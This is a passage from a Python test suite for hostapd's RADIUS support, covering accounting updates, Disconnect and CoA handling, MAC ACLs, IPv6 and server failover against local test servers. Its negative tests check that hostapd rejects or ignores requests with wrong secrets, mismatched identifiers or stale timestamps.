raise Exception("Unexpected RADIUS server auth MIB value")
def test_radius_acct_interim(dev, apdev):
"""RADIUS Accounting interim update"""
as_hapd = hostapd.Hostapd("as")
params = hostapd.wpa2_eap_params(ssid="radius-acct")
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "radius"
params['radius_acct_interim_interval'] = "1"
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-acct")
logger.info("Checking for RADIUS counters")
as_mib_start = as_hapd.get_mib(param="radius_server")
time.sleep(4.1)
as_mib_end = as_hapd.get_mib(param="radius_server")
req_s = int(as_mib_start['radiusAccServTotalRequests'])
req_e = int(as_mib_end['radiusAccServTotalRequests'])
if req_e < req_s + 3:
raise Exception("Unexpected RADIUS server acct MIB value (req_e=%d req_s=%d)" % (req_e, req_s))
# Disable Accounting server and wait for interim update retries to fail and
# expire.
as_hapd.disable()
time.sleep(15)
as_hapd.enable()
ok = False
for i in range(10):
time.sleep(1)
as_mib = as_hapd.get_mib(param="radius_server")
if int(as_mib['radiusAccServTotalRequests']) > 0:
ok = True
break
if not ok:
raise Exception("Accounting updates did not seen after server restart")
def test_radius_acct_interim_unreachable(dev, apdev):
"""RADIUS Accounting interim update with unreachable server"""
params = hostapd.wpa2_eap_params(ssid="radius-acct")
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "18139"
params['acct_server_shared_secret'] = "radius"
params['radius_acct_interim_interval'] = "1"
hapd = hostapd.add_ap(apdev[0], params)
start = hapd.get_mib()
connect(dev[0], "radius-acct")
logger.info("Waiting for interium accounting updates")
time.sleep(3.1)
end = hapd.get_mib()
req_s = int(start['radiusAccClientTimeouts'])
req_e = int(end['radiusAccClientTimeouts'])
if req_e < req_s + 2:
raise Exception("Unexpected RADIUS server acct MIB value")
def test_radius_acct_interim_unreachable2(dev, apdev):
"""RADIUS Accounting interim update with unreachable server (retry)"""
params = hostapd.wpa2_eap_params(ssid="radius-acct")
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "18139"
params['acct_server_shared_secret'] = "radius"
# Use long enough interim update interval to allow RADIUS retransmission
# case (3 seconds) to trigger first.
params['radius_acct_interim_interval'] = "4"
hapd = hostapd.add_ap(apdev[0], params)
start = hapd.get_mib()
connect(dev[0], "radius-acct")
logger.info("Waiting for interium accounting updates")
time.sleep(7.5)
end = hapd.get_mib()
req_s = int(start['radiusAccClientTimeouts'])
req_e = int(end['radiusAccClientTimeouts'])
if req_e < req_s + 2:
raise Exception("Unexpected RADIUS server acct MIB value")
def test_radius_acct_ipaddr(dev, apdev):
"""RADIUS Accounting and Framed-IP-Address"""
try:
_test_radius_acct_ipaddr(dev, apdev)
finally:
subprocess.call(['ip', 'link', 'set', 'dev', 'ap-br0', 'down'],
stderr=open('/dev/null', 'w'))
subprocess.call(['brctl', 'delbr', 'ap-br0'],
stderr=open('/dev/null', 'w'))
def _test_radius_acct_ipaddr(dev, apdev):
params = {"ssid": "radius-acct-open",
'acct_server_addr': "127.0.0.1",
'acct_server_port': "1813",
'acct_server_shared_secret': "radius",
'proxy_arp': '1',
'ap_isolate': '1',
'bridge': 'ap-br0'}
hapd = hostapd.add_ap(apdev[0], params, no_enable=True)
try:
hapd.enable()
except:
# For now, do not report failures due to missing kernel support
raise HwsimSkip("Could not start hostapd - assume proxyarp not supported in kernel version")
bssid = apdev[0]['bssid']
subprocess.call(['brctl', 'setfd', 'ap-br0', '0'])
subprocess.call(['ip', 'link', 'set', 'dev', 'ap-br0', 'up'])
dev[0].connect("radius-acct-open", key_mgmt="NONE", scan_freq="2412")
addr0 = dev[0].own_addr()
pkt = build_dhcp_ack(dst_ll="ff:ff:ff:ff:ff:ff", src_ll=bssid,
ip_src="192.168.1.1", ip_dst="255.255.255.255",
yiaddr="192.168.1.123", chaddr=addr0)
if "OK" not in hapd.request("DATA_TEST_FRAME ifname=ap-br0 " + binascii.hexlify(pkt).decode()):
raise Exception("DATA_TEST_FRAME failed")
dev[0].request("DISCONNECT")
dev[0].wait_disconnected()
hapd.disable()
def send_and_check_reply(srv, req, code, error_cause=0):
reply = srv.SendPacket(req)
logger.debug("RADIUS response from hostapd")
for i in list(reply.keys()):
logger.debug("%s: %s" % (i, reply[i]))
if reply.code != code:
raise Exception("Unexpected response code")
if error_cause:
if 'Error-Cause' not in reply:
raise Exception("Missing Error-Cause")
if reply['Error-Cause'][0] != error_cause:
raise Exception("Unexpected Error-Cause: {}".format(reply['Error-Cause']))
def test_radius_acct_psk(dev, apdev):
"""RADIUS Accounting - PSK"""
as_hapd = hostapd.Hostapd("as")
params = hostapd.wpa2_params(ssid="radius-acct", passphrase="12345678")
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "radius"
hapd = hostapd.add_ap(apdev[0], params)
dev[0].connect("radius-acct", psk="12345678", scan_freq="2412")
def test_radius_acct_psk_sha256(dev, apdev):
"""RADIUS Accounting - PSK SHA256"""
as_hapd = hostapd.Hostapd("as")
params = hostapd.wpa2_params(ssid="radius-acct", passphrase="12345678")
params["wpa_key_mgmt"] = "WPA-PSK-SHA256"
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "radius"
hapd = hostapd.add_ap(apdev[0], params)
dev[0].connect("radius-acct", key_mgmt="WPA-PSK-SHA256",
psk="12345678", scan_freq="2412")
def test_radius_acct_ft_psk(dev, apdev):
"""RADIUS Accounting - FT-PSK"""
as_hapd = hostapd.Hostapd("as")
params = ft_params1(ssid="radius-acct", passphrase="12345678")
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "radius"
hapd = hostapd.add_ap(apdev[0], params)
dev[0].connect("radius-acct", key_mgmt="FT-PSK",
psk="12345678", scan_freq="2412")
def test_radius_acct_ieee8021x(dev, apdev):
"""RADIUS Accounting - IEEE 802.1X"""
check_wep_capa(dev[0])
skip_with_fips(dev[0])
as_hapd = hostapd.Hostapd("as")
params = hostapd.radius_params()
params["ssid"] = "radius-acct-1x"
params["ieee8021x"] = "1"
params["wep_key_len_broadcast"] = "13"
params["wep_key_len_unicast"] = "13"
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "radius"
hapd = hostapd.add_ap(apdev[0], params)
dev[0].connect("radius-acct-1x", key_mgmt="IEEE8021X", eap="PSK",
identity="[email protected]",
password_hex="0123456789abcdef0123456789abcdef",
scan_freq="2412")
def test_radius_das_disconnect(dev, apdev):
"""RADIUS Dynamic Authorization Extensions - Disconnect"""
try:
import pyrad.client
import pyrad.packet
import pyrad.dictionary
import radius_das
except ImportError:
raise HwsimSkip("No pyrad modules available")
params = hostapd.wpa2_eap_params(ssid="radius-das")
params['radius_das_port'] = "3799"
params['radius_das_client'] = "127.0.0.1 secret"
params['radius_das_require_event_timestamp'] = "1"
params['own_ip_addr'] = "127.0.0.1"
params['nas_identifier'] = "nas.example.com"
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-das")
addr = dev[0].p2p_interface_addr()
sta = hapd.get_sta(addr)
id = sta['dot1xAuthSessionId']
dict = pyrad.dictionary.Dictionary("dictionary.radius")
srv = pyrad.client.Client(server="127.0.0.1", acctport=3799,
secret=b"secret", dict=dict)
srv.retries = 1
srv.timeout = 1
logger.info("Disconnect-Request with incorrect secret")
req = radius_das.DisconnectPacket(dict=dict, secret=b"incorrect",
User_Name="foo",
NAS_Identifier="localhost",
Event_Timestamp=int(time.time()))
logger.debug(req)
try:
reply = srv.SendPacket(req)
raise Exception("Unexpected response to Disconnect-Request")
except pyrad.client.Timeout:
logger.info("Disconnect-Request with incorrect secret properly ignored")
logger.info("Disconnect-Request without Event-Timestamp")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
User_Name="[email protected]")
logger.debug(req)
try:
reply = srv.SendPacket(req)
raise Exception("Unexpected response to Disconnect-Request")
except pyrad.client.Timeout:
logger.info("Disconnect-Request without Event-Timestamp properly ignored")
logger.info("Disconnect-Request with non-matching Event-Timestamp")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
User_Name="[email protected]",
Event_Timestamp=123456789)
logger.debug(req)
try:
reply = srv.SendPacket(req)
raise Exception("Unexpected response to Disconnect-Request")
except pyrad.client.Timeout:
logger.info("Disconnect-Request with non-matching Event-Timestamp properly ignored")
logger.info("Disconnect-Request with unsupported attribute")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
User_Name="foo",
User_Password="foo",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, 401)
logger.info("Disconnect-Request with invalid Calling-Station-Id")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
User_Name="foo",
Calling_Station_Id="foo",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, 407)
logger.info("Disconnect-Request with mismatching User-Name")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
User_Name="foo",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, 503)
logger.info("Disconnect-Request with mismatching Calling-Station-Id")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
Calling_Station_Id="12:34:56:78:90:aa",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, 503)
logger.info("Disconnect-Request with mismatching Acct-Session-Id")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
Acct_Session_Id="12345678-87654321",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, 503)
logger.info("Disconnect-Request with mismatching Acct-Session-Id (len)")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
Acct_Session_Id="12345678",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, 503)
logger.info("Disconnect-Request with mismatching Acct-Multi-Session-Id")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
Acct_Multi_Session_Id="12345678+87654321",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, 503)
logger.info("Disconnect-Request with mismatching Acct-Multi-Session-Id (len)")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
Acct_Multi_Session_Id="12345678",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, 503)
logger.info("Disconnect-Request with no session identification attributes")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, 503)
ev = dev[0].wait_event(["CTRL-EVENT-DISCONNECTED"], timeout=1)
if ev is not None:
raise Exception("Unexpected disconnection")
logger.info("Disconnect-Request with mismatching NAS-IP-Address")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
NAS_IP_Address="192.168.3.4",
Acct_Session_Id=id,
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, 403)
logger.info("Disconnect-Request with mismatching NAS-Identifier")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
NAS_Identifier="unknown.example.com",
Acct_Session_Id=id,
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, 403)
ev = dev[0].wait_event(["CTRL-EVENT-DISCONNECTED"], timeout=1)
if ev is not None:
raise Exception("Unexpected disconnection")
logger.info("Disconnect-Request with matching Acct-Session-Id")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
NAS_IP_Address="127.0.0.1",
NAS_Identifier="nas.example.com",
Acct_Session_Id=id,
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectACK)
dev[0].wait_disconnected(timeout=10)
dev[0].wait_connected(timeout=10, error="Re-connection timed out")
logger.info("Disconnect-Request with matching Acct-Multi-Session-Id")
sta = hapd.get_sta(addr)
multi_sess_id = sta['authMultiSessionId']
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
NAS_IP_Address="127.0.0.1",
NAS_Identifier="nas.example.com",
Acct_Multi_Session_Id=multi_sess_id,
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectACK)
dev[0].wait_disconnected(timeout=10)
dev[0].wait_connected(timeout=10, error="Re-connection timed out")
logger.info("Disconnect-Request with matching User-Name")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
NAS_Identifier="nas.example.com",
User_Name="[email protected]",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectACK)
dev[0].wait_disconnected(timeout=10)
dev[0].wait_connected(timeout=10, error="Re-connection timed out")
logger.info("Disconnect-Request with matching Calling-Station-Id")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
NAS_IP_Address="127.0.0.1",
Calling_Station_Id=addr,
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectACK)
dev[0].wait_disconnected(timeout=10)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED", "CTRL-EVENT-CONNECTED"])
if ev is None:
raise Exception("Timeout while waiting for re-connection")
if "CTRL-EVENT-EAP-STARTED" not in ev:
raise Exception("Unexpected skipping of EAP authentication in reconnection")
dev[0].wait_connected(timeout=10, error="Re-connection timed out")
logger.info("Disconnect-Request with matching Calling-Station-Id and non-matching CUI")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
Calling_Station_Id=addr,
Chargeable_User_Identity="[email protected]",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, error_cause=503)
logger.info("Disconnect-Request with matching CUI")
dev[1].connect("radius-das", key_mgmt="WPA-EAP",
eap="GPSK", identity="gpsk-cui",
password="abcdefghijklmnop0123456789abcdef",
scan_freq="2412")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
Chargeable_User_Identity="gpsk-chargeable-user-identity",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectACK)
dev[1].wait_disconnected(timeout=10)
dev[1].wait_connected(timeout=10, error="Re-connection timed out")
ev = dev[0].wait_event(["CTRL-EVENT-DISCONNECTED"], timeout=1)
if ev is not None:
raise Exception("Unexpected disconnection")
connect(dev[2], "radius-das")
logger.info("Disconnect-Request with matching User-Name - multiple sessions matching")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
NAS_Identifier="nas.example.com",
User_Name="[email protected]",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, error_cause=508)
logger.info("Disconnect-Request with User-Name matching multiple sessions, Calling-Station-Id only one")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
NAS_Identifier="nas.example.com",
Calling_Station_Id=addr,
User_Name="[email protected]",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectACK)
dev[0].wait_disconnected(timeout=10)
dev[0].wait_connected(timeout=10, error="Re-connection timed out")
ev = dev[2].wait_event(["CTRL-EVENT-DISCONNECTED"], timeout=1)
if ev is not None:
raise Exception("Unexpected disconnection")
logger.info("Disconnect-Request with matching Acct-Multi-Session-Id after disassociation")
sta = hapd.get_sta(addr)
multi_sess_id = sta['authMultiSessionId']
dev[0].request("DISCONNECT")
dev[0].wait_disconnected(timeout=10)
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
NAS_IP_Address="127.0.0.1",
NAS_Identifier="nas.example.com",
Acct_Multi_Session_Id=multi_sess_id,
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectACK)
dev[0].request("RECONNECT")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
dev[0].wait_connected(timeout=15)
logger.info("Disconnect-Request with matching User-Name after disassociation")
dev[0].request("DISCONNECT")
dev[0].wait_disconnected(timeout=10)
dev[2].request("DISCONNECT")
dev[2].wait_disconnected(timeout=10)
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
NAS_IP_Address="127.0.0.1",
NAS_Identifier="nas.example.com",
User_Name="[email protected]",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectACK)
logger.info("Disconnect-Request with matching CUI after disassociation")
dev[1].request("DISCONNECT")
dev[1].wait_disconnected(timeout=10)
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
NAS_IP_Address="127.0.0.1",
NAS_Identifier="nas.example.com",
Chargeable_User_Identity="gpsk-chargeable-user-identity",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectACK)
logger.info("Disconnect-Request with matching Calling-Station-Id after disassociation")
dev[0].request("RECONNECT")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
dev[0].wait_connected(timeout=15)
dev[0].request("DISCONNECT")
dev[0].wait_disconnected(timeout=10)
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
NAS_IP_Address="127.0.0.1",
NAS_Identifier="nas.example.com",
Calling_Station_Id=addr,
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectACK)
logger.info("Disconnect-Request with mismatching Calling-Station-Id after disassociation")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
NAS_IP_Address="127.0.0.1",
NAS_Identifier="nas.example.com",
Calling_Station_Id=addr,
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, error_cause=503)
def add_message_auth_req(req):
req.authenticator = req.CreateAuthenticator()
hmac_obj = hmac.new(req.secret, digestmod=hashlib.md5)
hmac_obj.update(struct.pack("B", req.code))
hmac_obj.update(struct.pack("B", req.id))
# request attributes
req.AddAttribute("Message-Authenticator", 16*b"\x00")
attrs = b''
for code, datalst in sorted(req.items()):
for data in datalst:
attrs += req._PktEncodeAttribute(code, data)
# Length
flen = 4 + 16 + len(attrs)
hmac_obj.update(struct.pack(">H", flen))
hmac_obj.update(16*b"\x00") # all zeros Authenticator in calculation
hmac_obj.update(attrs)
del req[80]
req.AddAttribute("Message-Authenticator", hmac_obj.digest())
def test_radius_das_disconnect_time_window(dev, apdev):
"""RADIUS Dynamic Authorization Extensions - Disconnect - time window"""
try:
import pyrad.client
import pyrad.packet
import pyrad.dictionary
import radius_das
except ImportError:
raise HwsimSkip("No pyrad modules available")
params = hostapd.wpa2_eap_params(ssid="radius-das")
params['radius_das_port'] = "3799"
params['radius_das_client'] = "127.0.0.1 secret"
params['radius_das_require_event_timestamp'] = "1"
params['radius_das_require_message_authenticator'] = "1"
params['radius_das_time_window'] = "10"
params['own_ip_addr'] = "127.0.0.1"
params['nas_identifier'] = "nas.example.com"
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-das")
addr = dev[0].own_addr()
sta = hapd.get_sta(addr)
id = sta['dot1xAuthSessionId']
dict = pyrad.dictionary.Dictionary("dictionary.radius")
srv = pyrad.client.Client(server="127.0.0.1", acctport=3799,
secret=b"secret", dict=dict)
srv.retries = 1
srv.timeout = 1
logger.info("Disconnect-Request with unsupported attribute")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
NAS_IP_Address="127.0.0.1",
NAS_Identifier="nas.example.com",
Calling_Station_Id=addr,
Event_Timestamp=int(time.time()) - 50)
add_message_auth_req(req)
logger.debug(req)
try:
reply = srv.SendPacket(req)
raise Exception("Unexpected response to Disconnect-Request")
except pyrad.client.Timeout:
logger.info("Disconnect-Request with non-matching Event-Timestamp properly ignored")
logger.info("Disconnect-Request with unsupported attribute")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
NAS_IP_Address="127.0.0.1",
NAS_Identifier="nas.example.com",
Calling_Station_Id=addr,
Event_Timestamp=int(time.time()))
add_message_auth_req(req)
send_and_check_reply(srv, req, pyrad.packet.DisconnectACK)
def test_radius_das_coa(dev, apdev):
"""RADIUS Dynamic Authorization Extensions - CoA"""
try:
import pyrad.client
import pyrad.packet
import pyrad.dictionary
import radius_das
except ImportError:
raise HwsimSkip("No pyrad modules available")
params = hostapd.wpa2_eap_params(ssid="radius-das")
params['radius_das_port'] = "3799"
params['radius_das_client'] = "127.0.0.1 secret"
params['radius_das_require_event_timestamp'] = "1"
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-das")
addr = dev[0].p2p_interface_addr()
sta = hapd.get_sta(addr)
id = sta['dot1xAuthSessionId']
dict = pyrad.dictionary.Dictionary("dictionary.radius")
srv = pyrad.client.Client(server="127.0.0.1", acctport=3799,
secret=b"secret", dict=dict)
srv.retries = 1
srv.timeout = 1
# hostapd does not currently support CoA-Request, so NAK is expected
logger.info("CoA-Request with matching Acct-Session-Id")
req = radius_das.CoAPacket(dict=dict, secret=b"secret",
Acct_Session_Id=id,
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.CoANAK, error_cause=405)
def test_radius_ipv6(dev, apdev):
"""RADIUS connection over IPv6"""
params = {}
params['ssid'] = 'as'
params['beacon_int'] = '2000'
params['radius_server_clients'] = 'auth_serv/radius_clients_ipv6.conf'
params['radius_server_ipv6'] = '1'
params['radius_server_auth_port'] = '18129'
params['radius_server_acct_port'] = '18139'
params['eap_server'] = '1'
params['eap_user_file'] = 'auth_serv/eap_user.conf'
params['ca_cert'] = 'auth_serv/ca.pem'
params['server_cert'] = 'auth_serv/server.pem'
params['private_key'] = 'auth_serv/server.key'
hostapd.add_ap(apdev[1], params)
params = hostapd.wpa2_eap_params(ssid="radius-ipv6")
params['auth_server_addr'] = "::0"
params['auth_server_port'] = "18129"
params['acct_server_addr'] = "::0"
params['acct_server_port'] = "18139"
params['acct_server_shared_secret'] = "radius"
params['own_ip_addr'] = "::0"
hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-ipv6")
def test_radius_macacl(dev, apdev):
"""RADIUS MAC ACL"""
params = hostapd.radius_params()
params["ssid"] = "radius"
params["macaddr_acl"] = "2"
hostapd.add_ap(apdev[0], params)
dev[0].connect("radius", key_mgmt="NONE", scan_freq="2412")
# Invalid VLAN ID from RADIUS server
dev[2].connect("radius", key_mgmt="NONE", scan_freq="2412")
dev[2].request("REMOVE_NETWORK all")
dev[2].wait_disconnected()
dev[2].connect("radius", key_mgmt="NONE", scan_freq="2412")
def test_radius_macacl_acct(dev, apdev):
"""RADIUS MAC ACL and accounting enabled"""
params = hostapd.radius_params()
params["ssid"] = "radius"
params["macaddr_acl"] = "2"
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "radius"
hostapd.add_ap(apdev[0], params)
dev[0].connect("radius", key_mgmt="NONE", scan_freq="2412")
dev[1].connect("radius", key_mgmt="NONE", scan_freq="2412")
dev[1].request("DISCONNECT")
dev[1].wait_disconnected()
dev[1].request("RECONNECT")
def test_radius_macacl_oom(dev, apdev):
"""RADIUS MAC ACL and OOM"""
params = hostapd.radius_params()
params["ssid"] = "radius"
params["macaddr_acl"] = "2"
hapd = hostapd.add_ap(apdev[0], params)
bssid = hapd.own_addr()
dev[0].scan_for_bss(bssid, freq="2412")
with alloc_fail(hapd, 1, "hostapd_allowed_address"):
dev[0].connect("radius", key_mgmt="NONE", scan_freq="2412")
dev[1].scan_for_bss(bssid, freq="2412")
with alloc_fail(hapd, 2, "hostapd_allowed_address"):
dev[1].connect("radius", key_mgmt="NONE", scan_freq="2412")
dev[2].scan_for_bss(bssid, freq="2412")
with alloc_fail(hapd, 2, "=hostapd_allowed_address"):
dev[2].connect("radius", key_mgmt="NONE", scan_freq="2412")
def test_radius_macacl_unreachable(dev, apdev):
"""RADIUS MAC ACL and server unreachable"""
params = hostapd.radius_params()
params['auth_server_port'] = "18139"
params["ssid"] = "radius"
params["macaddr_acl"] = "2"
hapd = hostapd.add_ap(apdev[0], params)
bssid = hapd.own_addr()
dev[0].scan_for_bss(bssid, freq="2412")
dev[0].connect("radius", key_mgmt="NONE", scan_freq="2412",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-CONNECTED"], timeout=3)
if ev is not None:
raise Exception("Unexpected connection")
logger.info("Fix authentication server port")
hapd.set("auth_server_port", "1812")
hapd.disable()
hapd.enable()
dev[0].wait_connected(timeout=20)
dev[0].request("DISCONNECT")
dev[0].wait_disconnected()
def test_radius_failover(dev, apdev):
"""RADIUS Authentication and Accounting server failover"""
subprocess.call(['ip', 'ro', 'replace', '192.168.213.17', 'dev', 'lo'])
as_hapd = hostapd.Hostapd("as")
as_mib_start = as_hapd.get_mib(param="radius_server")
params = hostapd.wpa2_eap_params(ssid="radius-failover")
params["auth_server_addr"] = "192.168.213.17"
params["auth_server_port"] = "1812"
params["auth_server_shared_secret"] = "testing"
params['acct_server_addr'] = "192.168.213.17"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "testing"
params['radius_retry_primary_interval'] = "20"
hapd = hostapd.add_ap(apdev[0], params, no_enable=True)
hapd.set("auth_server_addr", "127.0.0.1")
hapd.set("auth_server_port", "1812")
hapd.set("auth_server_shared_secret", "radius")
hapd.set('acct_server_addr', "127.0.0.1")
hapd.set('acct_server_port', "1813")
hapd.set('acct_server_shared_secret', "radius")
hapd.enable()
ev = hapd.wait_event(["AP-ENABLED", "AP-DISABLED"], timeout=30)
if ev is None:
raise Exception("AP startup timed out")
if "AP-ENABLED" not in ev:
raise Exception("AP startup failed")
start = os.times()[4]
try:
subprocess.call(['ip', 'ro', 'replace', 'prohibit', '192.168.213.17'])
dev[0].request("SET EAPOL::authPeriod 5")
connect(dev[0], "radius-failover", wait_connect=False)
dev[0].wait_connected(timeout=20)
finally:
dev[0].request("SET EAPOL::authPeriod 30")
subprocess.call(['ip', 'ro', 'del', '192.168.213.17'])
as_mib_end = as_hapd.get_mib(param="radius_server")
req_s = int(as_mib_start['radiusAccServTotalRequests'])
req_e = int(as_mib_end['radiusAccServTotalRequests'])
if req_e <= req_s:
raise Exception("Unexpected RADIUS server acct MIB value")
end = os.times()[4]
try:
subprocess.call(['ip', 'ro', 'replace', 'prohibit', '192.168.213.17'])
dev[1].request("SET EAPOL::authPeriod 5")
if end - start < 21:
time.sleep(21 - (end - start))
connect(dev[1], "radius-failover", wait_connect=False)
dev[1].wait_connected(timeout=20)
finally:
dev[1].request("SET EAPOL::authPeriod 30")
subprocess.call(['ip', 'ro', 'del', '192.168.213.17'])
def run_pyrad_server(srv, t_events):
srv.RunWithStop(t_events)
def test_radius_protocol(dev, apdev):
"""RADIUS Authentication protocol tests with a fake server"""
try:
import pyrad.server
import pyrad.packet
import pyrad.dictionary
except ImportError:
raise HwsimSkip("No pyrad modules available")
class TestServer(pyrad.server.Server):
def _HandleAuthPacket(self, pkt):
pyrad.server.Server._HandleAuthPacket(self, pkt)
logger.info("Received authentication request")
reply = self.CreateReplyPacket(pkt)
reply.code = pyrad.packet.AccessAccept
if self.t_events['msg_auth'].is_set():
logger.info("Add Message-Authenticator")
if self.t_events['wrong_secret'].is_set():
logger.info("Use incorrect RADIUS shared secret")
pw = b"incorrect"
else:
pw = reply.secret
hmac_obj = hmac.new(pw, digestmod=hashlib.md5)
hmac_obj.update(struct.pack("B", reply.code))
hmac_obj.update(struct.pack("B", reply.id))
# reply attributes
reply.AddAttribute("Message-Authenticator", 16*b"\x00")
attrs = reply._PktEncodeAttributes()
# Length
flen = 4 + 16 + len(attrs)
hmac_obj.update(struct.pack(">H", flen))
hmac_obj.update(pkt.authenticator)
hmac_obj.update(attrs)
if self.t_events['double_msg_auth'].is_set():
logger.info("Include two Message-Authenticator attributes")
else:
del reply[80]
reply.AddAttribute("Message-Authenticator", hmac_obj.digest())
self.SendReplyPacket(pkt.fd, reply)
def RunWithStop(self, t_events):
self._poll = select.poll()
self._fdmap = {}
self._PrepareSockets()
self.t_events = t_events
while not t_events['stop'].is_set():
for (fd, event) in self._poll.poll(1000):
if event == select.POLLIN:
try:
fdo = self._fdmap[fd]
self._ProcessInput(fdo)
except pyrad.server.ServerPacketError as err:
logger.info("pyrad server dropping packet: " + str(err))
except pyrad.packet.PacketError as err:
logger.info("pyrad server received invalid packet: " + str(err))
else:
logger.error("Unexpected event in pyrad server main loop")
for fd in self.authfds + self.acctfds:
fd.close()
srv = TestServer(dict=pyrad.dictionary.Dictionary("dictionary.radius"),
authport=18138, acctport=18139)
srv.hosts["127.0.0.1"] = pyrad.server.RemoteHost("127.0.0.1",
b"radius",
"localhost")
srv.BindToAddress("")
t_events = {}
t_events['stop'] = threading.Event()
t_events['msg_auth'] = threading.Event()
t_events['wrong_secret'] = threading.Event()
t_events['double_msg_auth'] = threading.Event()
t = threading.Thread(target=run_pyrad_server, args=(srv, t_events))
t.start()
try:
params = hostapd.wpa2_eap_params(ssid="radius-test")
params['auth_server_port'] = "18138"
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-test", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
time.sleep(1)
dev[0].request("REMOVE_NETWORK all")
time.sleep(0.1)
dev[0].dump_monitor()
t_events['msg_auth'].set()
t_events['wrong_secret'].set()
connect(dev[0], "radius-test", wait_connect=False)
time.sleep(1)
dev[0].request("REMOVE_NETWORK all")
time.sleep(0.1)
dev[0].dump_monitor()
t_events['wrong_secret'].clear()
connect(dev[0], "radius-test", wait_connect=False)
time.sleep(1)
dev[0].request("REMOVE_NETWORK all")
time.sleep(0.1)
